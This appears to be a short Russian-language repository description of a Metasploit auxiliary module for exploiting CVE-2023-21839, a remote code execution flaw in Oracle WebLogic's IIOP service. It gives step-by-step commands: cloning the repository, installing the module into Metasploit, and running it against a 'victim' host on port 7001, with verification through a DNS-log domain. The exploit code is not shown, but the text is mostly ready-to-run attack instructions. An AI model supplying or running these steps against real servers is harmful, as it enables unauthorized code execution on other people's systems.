
Вспомогательный модуль Metasploit для эксплуатации CVE-2023-21839 (WebLogic IIOP RCE) с проверкой через DNS-логи. Автоматизирует удаленное выполнение кода на уязвимых серверах Oracle WebLogic.
git clone https://github.com/kurehalin/CVE-2023-21839-metasploit-scanner
cd CVE-2023-21839-metasploit-scanner
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp weblogic_iiop_rce.py ~/.msf4/modules/auxiliary/scanner/http
chmod +x ~/.msf4/modules/auxiliary/scanner/http/weblogic_iiop_rce.py
msfconsole
use auxiliary/scanner/http/weblogic_iiop_rce
set rhost <ip жертвы>
set rport 7001
set verify_dnslog <ваш конкретный домен dnslog>
run
